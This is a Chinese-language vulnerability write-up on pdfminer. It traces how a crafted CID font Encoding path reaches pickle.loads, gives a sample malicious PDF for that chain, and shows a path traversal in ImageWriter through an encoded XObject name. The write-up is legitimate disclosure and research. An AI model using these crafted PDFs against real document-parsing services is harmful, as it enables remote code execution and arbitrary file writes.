Pdfminer code auditing and script development

script path: https://github.com/L1nq0/Pdfminer-CMap-Generator

CMapDB Deserialization

cmapdb.py#CMapDB._load_data 调用 pickle.loads



_load_data 传入参数 name 去除空字节,并插入 %s.pickle.gz 中,然后将 cmap_paths 中路径与 filename 拼接;CMAP_PATH 为 cmap 的绝对路径如 /../site-packages/pdfminer/cmap,如果拼接后的文件真实存在,则用 gzip 模块读取并将内容交由 pickle.loads() 反序列化。

要求文件真实存在,文件名写死为 .pickle.gz 后缀且是正确的 gzip 文件体,才会反序列化

class CMapDB:
_cmap_cache: Dict[str, PyCMap] = {}
_umap_cache: Dict[str, List[PyUnicodeMap]] = {} class CMapNotFound(CMapError):
pass @classmethod
def _load_data(cls, name: str) -> Any:
name = name.replace("\0", "")
filename = "%s.pickle.gz" % name
log.debug("loading: %r", name)
cmap_paths = (
os.environ.get("CMAP_PATH", "/usr/share/pdfminer/"),
os.path.join(os.path.dirname(__file__), "cmap"),
)
for directory in cmap_paths:
path = os.path.join(directory, filename)
if os.path.exists(path):
gzfile = gzip.open(path)
gzfiles = gzfile.read()
try:
return type(str(name), (), pickle.loads(gzfile.read()))
finally:
gzfile.close()
raise CMapDB.CMapNotFound(name)

上游调用路径分析

CMAP_PATH 与 /usr/share/pdfminer/ 基本不可控,无法往其路径写/传文件,要走进 pickle 必须 name 可控。

往前追踪,get_cmap(cls, name: str)方法从缓存中获取 CMap,如果缓存中没有,则调用 _load_data 来加载 cmap 数据

class CMapDB
_cmap_cache: Dict[str, PyCMap] = {}
@classmethod
def get_cmap(cls, name: str) -> CMapBase:
if name == "Identity-H":
return IdentityCMap(WMode=0)
elif name == "Identity-V":
return IdentityCMap(WMode=1)
elif name == "OneByteIdentityH":
return IdentityCMapByte(WMode=0)
elif name == "OneByteIdentityV":
return IdentityCMapByte(WMode=1)
try:
return cls._cmap_cache[name]
except KeyError:
pass
data = cls._load_data(name)
cls._cmap_cache[name] = cmap = PyCMap(name, data)
return cmap

再往前,pdffont.py::PDFCIDFont.get_cmap_from_spec() 调用了 get_cmap

class PDFCIDFont(PDFFont):
def get_cmap_from_spec(self, spec: Mapping[str, Any], strict: bool) -> CMapBase:
"""Get cmap from font specification For certain PDFs, Encoding Type isn't mentioned as an attribute of
Encoding but as an attribute of CMapName, where CMapName is an
attribute of spec['Encoding'].
The horizontal/vertical modes are mentioned with different name
such as 'DLIdent-H/V','OneByteIdentityH/V','Identity-H/V'.
"""
cmap_name = self._get_cmap_name(spec, strict) try:
return CMapDB.get_cmap(cmap_name)
except CMapDB.CMapNotFound as e:
if strict:
raise PDFFontError(e)
return CMap()

cmap_name 属性受 _get_cmap_name() 控制,进入该方法。spec 是一个字典对象,键是 str 类型,值的类型是任意的 Any;

get_cmap_from_spec 会从 spec 中提取 Encoding 键下的 cmap 名称。如果 Encoding 中包含 CMapName 键,则该键的值会作为 cmap 名称传递给 get_cmap 方法。

class PDFCIDFont(PDFFont):
def _get_cmap_name(spec: Mapping[str, Any], strict: bool) -> str:
"""Get cmap name from font specification"""
cmap_name = "unknown" # default value try:
spec_encoding = spec["Encoding"]
if hasattr(spec_encoding, "name"):
cmap_name = literal_name(spec["Encoding"])
else:
cmap_name = literal_name(spec_encoding["CMapName"])
except KeyError:
if strict:
raise PDFFontError("Encoding is unspecified") if type(cmap_name) is PDFStream: # type: ignore[comparison-overlap]
cmap_name_stream: PDFStream = cast(PDFStream, cmap_name)
if "CMapName" in cmap_name_stream:
cmap_name = cmap_name_stream.get("CMapName").name
else:
if strict:
raise PDFFontError("CMapName unspecified for encoding") return IDENTITY_ENCODER.get(cmap_name, cmap_name)

此时参数传递从 spec['Encoding'] -> cmap_name -> name,如果 spec 可控则能影响 cmap 打开的文件名。

继续往上追踪,PDFCIDFont 类初始化时调用了 get_cmap_from_spec,__init__初始化定义了一些对象和属性,继续往上追 spec



在 pdfinterp.py::PDFResourceManager.get_font() 找到相关操作,subtype 被赋值为 spec['Subtype'],如果其是 CIDFontType0、CIDFontType2 任意之一,则实例化 PDFCIDFont。关键就在 spec,但其谁控制仍未知,抱着疑惑继续往前追



init_resources() 先赋值 resources 字典,如果值为 Font 且其内部键值属于 PDFObjRef 类或子类,便调用 pdftypes.dict_value(x: object) 将 'Font' 对象中的关键字段一一取出交给 spec,并传给 get_font(objid, spec)

class PDFPageInterpreter:
def init_resources(self, resources: Dict[object, object]) -> None:
self.resources = resources
self.fontmap: Dict[object, PDFFont] = {}
self.xobjmap = {}
self.csmap: Dict[str, PDFColorSpace] = PREDEFINED_COLORSPACE.copy()
if not resources:
return def get_colorspace(spec: object) -> Optional[PDFColorSpace]:
if isinstance(spec, list):
name = literal_name(spec[0])
else:
name = literal_name(spec)
if name == "ICCBased" and isinstance(spec, list) and 2 <= len(spec):
return PDFColorSpace(name, stream_value(spec[1])["N"])
elif name == "DeviceN" and isinstance(spec, list) and 2 <= len(spec):
return PDFColorSpace(name, len(list_value(spec[1])))
else:
return PREDEFINED_COLORSPACE.get(name) for (k, v) in dict_value(resources).items():
log.debug("Resource: %r: %r", k, v)
if k == "Font":
for (fontid, spec) in dict_value(v).items():
objid = None
if isinstance(spec, PDFObjRef):
objid = spec.objid
spec = dict_value(spec)
self.fontmap[fontid] = self.rsrcmgr.get_font(objid, spec)
elif k == "ColorSpace":
for (csid, spec) in dict_value(v).items():
colorspace = get_colorspace(resolve1(spec))
if colorspace is not None:
self.csmap[csid] = colorspace
elif k == "ProcSet":
self.rsrcmgr.get_procset(list_value(v))
elif k == "XObject":
for (xobjid, xobjstrm) in dict_value(v).items():
self.xobjmap[xobjid] = xobjstrm
return

process_page() 将 page.resources 丢给 render_contents() 执行,随后 resources 被传递给 init_resources(),这里的 resources 就是被 dict_value 处理的 Font 对象

class PDFPageInterpreter:
def process_page(self, page: PDFPage) -> None:
log.debug("Processing page: %r", page)
(x0, y0, x1, y1) = page.mediabox
if page.rotate == 90:
ctm = (0, -1, 1, 0, -y0, x1)
elif page.rotate == 180:
ctm = (-1, 0, 0, -1, x1, y1)
elif page.rotate == 270:
ctm = (0, 1, -1, 0, y1, -x0)
else:
ctm = (1, 0, 0, 1, -x0, -y0)
self.device.begin_page(page, ctm)
self.render_contents(page.resources, page.contents, ctm=ctm)
self.device.end_page(page)
return def render_contents(
self,
resources: Dict[object, object],
streams: Sequence[object],
ctm: Matrix = MATRIX_IDENTITY,
) -> None:
log.debug(
"render_contents: resources=%r, streams=%r, ctm=%r", resources, streams, ctm
)
self.init_resources(resources)
self.init_state(ctm)
self.execute(list_value(streams))
return

最后追到入口点,一共找到两个

  • high_level.py::extract_pages()
  • high_level.py::extract_text()

    这两个方法都用于从 PDF 文件中提取信息,本身就是 Pdfminer 与外部交互的主要入口,利用链到此到头
def extract_text(
pdf_file: FileOrName,
password: str = "",
page_numbers: Optional[Container[int]] = None,
maxpages: int = 0,
caching: bool = True,
codec: str = "utf-8",
laparams: Optional[LAParams] = None,
) -> str:
"""Parse and return the text contained in a PDF file. :param pdf_file: Either a file path or a file-like object for the PDF file
to be worked on.
:param password: For encrypted PDFs, the password to decrypt.
:param page_numbers: List of zero-indexed page numbers to extract.
:param maxpages: The maximum number of pages to parse
:param caching: If resources should be cached
:param codec: Text decoding codec
:param laparams: An LAParams object from pdfminer.layout. If None, uses
some default settings that often work well.
:return: a string containing all of the text extracted.
"""
if laparams is None:
laparams = LAParams() with open_filename(pdf_file, "rb") as fp, StringIO() as output_string:
fp = cast(BinaryIO, fp) # we opened in binary mode
rsrcmgr = PDFResourceManager(caching=caching)
device = TextConverter(rsrcmgr, output_string, codec=codec, laparams=laparams)
interpreter = PDFPageInterpreter(rsrcmgr, device) for page in PDFPage.get_pages(
fp,
page_numbers,
maxpages=maxpages,
password=password,
caching=caching,
):
interpreter.process_page(page) return output_string.getvalue() def extract_pages(
pdf_file: FileOrName,
password: str = "",
page_numbers: Optional[Container[int]] = None,
maxpages: int = 0,
caching: bool = True,
laparams: Optional[LAParams] = None,
) -> Iterator[LTPage]:
"""Extract and yield LTPage objects :param pdf_file: Either a file path or a file-like object for the PDF file
to be worked on.
:param password: For encrypted PDFs, the password to decrypt.
:param page_numbers: List of zero-indexed page numbers to extract.
:param maxpages: The maximum number of pages to parse
:param caching: If resources should be cached
:param laparams: An LAParams object from pdfminer.layout. If None, uses
some default settings that often work well.
:return: LTPage objects
"""
if laparams is None:
laparams = LAParams() with open_filename(pdf_file, "rb") as fp:
fp = cast(BinaryIO, fp) # we opened in binary mode
resource_manager = PDFResourceManager(caching=caching)
device = PDFPageAggregator(resource_manager, laparams=laparams)
interpreter = PDFPageInterpreter(resource_manager, device)
for page in PDFPage.get_pages(
fp,
page_numbers,
maxpages=maxpages,
password=password,
caching=caching,
):
interpreter.process_page(page)
layout = device.get_result()
yield layout

溯源整个流程,从 extract_ 双方法开始。PDFPage.get_pages() 会通过 PDFParser 解析 PDF 文件,并生成一个 PDFDocument 对象。这个对象包含了文档的结构和元数据。然后迭代文档中的每一页,并调用 create_pages(doc) 来生成具体的页面对象。然后提取的 PDF 元数据交给下游方法处理

class PDFPage:
def get_pages(
cls,
fp: BinaryIO,
pagenos: Optional[Container[int]] = None,
maxpages: int = 0,
password: str = "",
caching: bool = True,
check_extractable: bool = False,
) -> Iterator["PDFPage"]:
parser = PDFParser(fp)
doc = PDFDocument(parser, password=password, caching=caching)
if not doc.is_extractable:
if check_extractable:
error_msg = "Text extraction is not allowed: %r" % fp
raise PDFTextExtractionNotAllowed(error_msg)
else:
warning_msg = (
"The PDF %r contains a metadata field "
"indicating that it should not allow "
"text extraction. Ignoring this field "
"and proceeding. Use the check_extractable "
"if you want to raise an error in this case" % fp
)
log.warning(warning_msg)
for pageno, page in enumerate(cls.create_pages(doc)):
if pagenos and (pageno not in pagenos):
continue
yield page
if maxpages and maxpages <= pageno + 1:
break

利用链

high_level.py::extract_pages()/extract_text()
pdfinterp.py::PDFPageInterpreter.process_page(page)
pdfinterp.py::PDFPageInterpreter.render_contents(resources, contents)
pdfinterp.py::PDFPageInterpreter.init_resources(resources)
pdfinterp.py::PDFResourceManager.get_font(objid, spec)
pdffont.py::PDFCIDFont.__init__(rsrcmgr, spec, strict)
pdffont.py::PDFCIDFont.get_cmap_from_spec(spec, strict)
cmapdb.py::CMapDB.get_cmap(cmap_name)
cmapdb.py::CMapDB._load_data(name)

将 PDF Font 对象关键字段定义好,Type = Type0、Subtype = CIDFontType0 or CIDFontType2、Encoding = GZIP 文件绝对路径,同时绝对路径中 /需要替换为 #2F,并使用 extract_pages()/extract_text() 操作 PDF 文件,Pdfminer 就会读取 GZIP 内容并反序列化

PDF 格式体利用示例

%PDF-1.4
%E2%E3%CF%D3
1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj 2 0 obj
<< /Type /Pages /Count 1 /Kids [3 0 R] >>
endobj 3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Resources << /Font << /F1 5 0 R >> >> /Contents 4 0 R >>
endobj 4 0 obj
<< /Length 22 >>
stream
BT /F1 12 Tf (A) Tj ET
endstream
endobj 5 0 obj
<< /Type /Font /Subtype /Type0 /BaseFont /Identity-H /Encoding /app/uploads/l1 /DescendantFonts [6 0 R] >>
endobj 6 0 obj
<< /Type /Font /Subtype /CIDFontType2 /BaseFont /Dummy /CIDSystemInfo << /Registry (Adobe) /Ordering (Identity) /Supplement 0 >> >>
endobj xref
0 7
0000000000 65535 f
0000000010 00000 n
0000000077 00000 n
0000000176 00000 n
0000000273 00000 n
0000000325 00000 n
0000000375 00000 n
trailer
<< /Size 7 /Root 1 0 R >>
startxref
410
%%EOF

Path Traversal in ImageWriter

在看 Pdfminer 的图片提取与写入功能时发现的逻辑缺陷,虽然没软用简单扯一嘴

当使用 Pdfminer 提取 PDF 中的图片时,通常可以这样调用

for page in extract_pages(pdf_file):
for element in page:
if isinstance(element, LTFigure):
for item in element:
if isinstance(item, LTImage):
result = writer.export_image(item)

Pdfminer 会将 PDF 中的图片保存到指定目录。但问题来了,保存时文件名经过怎样的处理呢?

通过阅读源码,我发现了关键的逻辑在ImageWriter.create_unique_image_name中:

def _create_unique_image_name(self, image: LTImage, ext: str) -> Tuple[str, str]:
name = image.name + ext
path = os.path.join(self.outdir, name)
img_index = 0
while os.path.exists(path):
name = "%s.%d%s" % (image.name, img_index, ext)
path = os.path.join(self.outdir, name)
img_index += 1
return name, path

_create_unique_image_name 在处理 PDF 文件中的图片资源时,直接使用了 XObject 的名称作为输出文件名的一部分,与输出路径 outdir 拼接形成新路径,没有做精细校验,与上面分析类似 PDF 可控则 image.name 可控

Pdfminer 解析并创建 LTImage 对象,其 name 属性赋值为指定路径,export_image 是操作入口

class ImageWriter:
def export_image(self, image: LTImage) -> str:
"""Save an LTImage to disk"""
(width, height) = image.srcsize filters = image.stream.get_filters() if filters[-1][0] in LITERALS_DCT_DECODE:
name = self._save_jpeg(image) elif filters[-1][0] in LITERALS_JPX_DECODE:
name = self._save_jpeg2000(image) elif self._is_jbig2_iamge(image):
name = self._save_jbig2(image) elif image.bits == 1:
name = self._save_bmp(image, width, height, (width + 7) // 8, image.bits) elif image.bits == 8 and (
LITERAL_DEVICE_RGB in image.colorspace
or LITERAL_INLINE_DEVICE_RGB in image.colorspace
):
name = self._save_bmp(image, width, height, width * 3, image.bits * 3) elif image.bits == 8 and (
LITERAL_DEVICE_GRAY in image.colorspace
or LITERAL_INLINE_DEVICE_GRAY in image.colorspace
):
name = self._save_bmp(image, width, height, width, image.bits) elif len(filters) == 1 and filters[0][0] in LITERALS_FLATE_DECODE:
name = self._save_bytes(image) else:
name = self._save_raw(image) return name

获取到文件名及路径后,Pdfminer 直接用 path 路径将写入文件 fp.write,假设 path 为 /x/x/uploads/../../../tmp/l1.jpg,就能进行跨目录写文件

def _save_jpeg(self, image: LTImage) -> str:
"""Save a JPEG encoded image"""
data = image.stream.get_data() name, path = self._create_unique_image_name(image, ".jpg")
with open(path, "wb") as fp:
if LITERAL_DEVICE_CMYK in image.colorspace:
try:
from PIL import Image, ImageChops # type: ignore[import]
except ImportError:
raise ImportError(PIL_ERROR_MESSAGE) ifp = BytesIO(data)
i = Image.open(ifp)
i = ImageChops.invert(i)
i = i.convert("RGB")
i.save(fp, "JPEG")
else:
fp.write(data) return name

如果控制 PDF 内的 XObject 名称,是否就可控写入?我构造一个恶意 PDF 来完成构想

3 0 obj
<<
/Type /Page
/Resources <<
/XObject <<
/#2E#2E#2F#2E#2E#2F#2E#2E#2F#2E#2E#2Ftmp#2Fpwned 4 0 R
>>
>>
>>
...

path 成功控制为指定内容



便写入成功了



Python 的环境限制大,不像 PHP 可以直接解析执行代码,应用环境特别狭窄,只有某些情况下打 XSS 等,没危害;并且这里后缀名也是强制拼接,无法控制

name, path = self._create_unique_image_name(image, ".jpg")
=>
def _create_unique_image_name(self, image: LTImage, ext: str) -> Tuple[str, str]:
name = image.name + ext
path = os.path.join(self.outdir, name)
img_index = 0
while os.path.exists(path):
name = "%s.%d%s" % (image.name, img_index, ext)
path = os.path.join(self.outdir, name)
img_index += 1
return name, path
...
@staticmethod
def _is_jbig2_iamge(image: LTImage) -> bool:
filters = image.stream.get_filters()
for filter_name, params in filters:
if filter_name in LITERALS_JBIG2_DECODE:
return True
return False

Pdfminer-Vulnerability-Research的更多相关文章

  1. 转:Awesome Vulnerability Research

    转:https://github.com/re-pronin/Awesome-Vulnerability-Research Awesome Vulnerability Research 

  2. Burp Suite教程(英文版)

    In this article, we are going to see another powerful framework that is used widely in pen-testing. ...

  3. IIS短文件漏洞(搬运整理)

    0x01. IIS短文件漏洞的由来 Microsoft IIS 短文件/文件夹名称信息泄漏最开始由Vulnerability Research Team(漏洞研究团队)的Soroush Dalili在 ...

  4. (转)Awesome Courses

    Awesome Courses  Introduction There is a lot of hidden treasure lying within university pages scatte ...

  5. IIS短文件猜解

    1.IIS短文件漏洞 Microsoft IIS 短文件/文件夹名称信息泄漏最开始由Vulnerability Research Team(漏洞研究团队)的Soroush Dalili在2010年8月 ...

  6. An iOS zero-click radio proximity exploit odyssey

    NOTE: This specific issue was fixed before the launch of Privacy-Preserving Contact Tracing in iOS 1 ...

  7. PHP serialize && unserialize Security Risk Research

    目录 . 序列化的定义 . serialize:序列化 . unserialize:反序列化 . 序列化.反序列化存在的安全风险 . Use After Free Vulnerability -] . ...

  8. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

  9. ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728)

    ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728) By Perception Point Resear ...

  10. Research Guide: Pruning Techniques for Neural Networks

    Research Guide: Pruning Techniques for Neural Networks 2019-11-15 20:16:54 Original: https://heartbe ...

随机推荐

  1. vscode linux c++ 配置

    简介 最官方的配置方案 https://code.visualstudio.com/docs/cpp/config-linux 有三个文件会生成 tasks.json (编译器构建设置) launch ...

  2. 推荐一款比Flink CDC更好用的免费CDC工具

    很多中大型企业都希望选择一款足够轻量好用的CDC工具,而且最好是小白用户都能使用的CDC工具,今天就推荐一款小白都能安装并立即使用的CDC工具给大家. CDC(Change Data Capture) ...

  3. SciTech-Science: 纯色滤(分)光塑料片: 将光分解为BGR三原纯色(彩色CCD传感器原理) + “502熏显法”采集“指纹”与Glue胶水: 普通胶水是“胶”与“水”混合物因此不会黏上瓶子

    彩色滤(分)光塑料片: 将光分解为BGR三原纯色 彩色CCD传感器原理 透过 一张 彩色滤(分)光塑料片 可以分解出 光源的"与滤光片同颜色"的成份: 例如 "B(蓝色) ...

  4. win11专业版取消开机密码的问题

    许多雨林木风官网的小伙伴在第一次安装win11专业版的时候,设置了帐号和密码,但是每次电脑开机都要输入密码,使用起来非常不方便.那么,我们要如何取消开机密码呢?接下来,ylmf系统小编就来分享详细的操 ...

  5. Unity中Inspector面板显示提示

    效果如下 上面有个 "可选变量"  ,然后鼠标移动到变量上会显示一段文字 实现方法 [Header("可选变量")]//直接显示汉字在面板上 [Tooltip( ...

  6. 从git仓库下载 单个文件或者文件夹

    转载自:https://www.cnblogs.com/yaolaoer/p/14564985.html 下载单个文件到压缩包:aab.zipgit archive --remote=ssh://ge ...

  7. RFX2401C 2.4G射频放大电路

    RFX2401C RFX2401C 是一个2.4 GHz频段射频放大芯片, 尺寸只有3mm*3mm, qfn16封装, 单芯片集成PA和LNA, 外围电路简单, 在带功率放大的nrf24l01模块以及 ...

  8. 如何用 mc 对 RustFS 进行存储桶的创建和查询?

    mc(minio client)是一个与 Minio 对象存储服务兼容的命令行工具,能够对 minio 进行操作,诸如文件的上传.下载.删除等.由于 RustFS 是 MinIO 的国产替代,因此可以 ...

  9. PPT(一)-默认设置

    一.暗夜模式 二.无限撤回 三.自动保存 四.图片压缩 五.字体嵌入 防止不同电脑打开字体不一样 六.多格式导出 实际上是可以将ppt文件导出成pdf.视频.图片形式的ppt的. ppt的每页导出成图 ...

  10. 简单的博客页面客制化 v1

    DIY博客的页面 写在前面: 申请了博客第一件事当然是整一个炫酷的界面. 自己水平不够,选了个比较顺眼的皮肤,大部分是套用网上现成的模板完成的. 具体定制的内容: 1.字体的修改 2.版面占比的调整 ...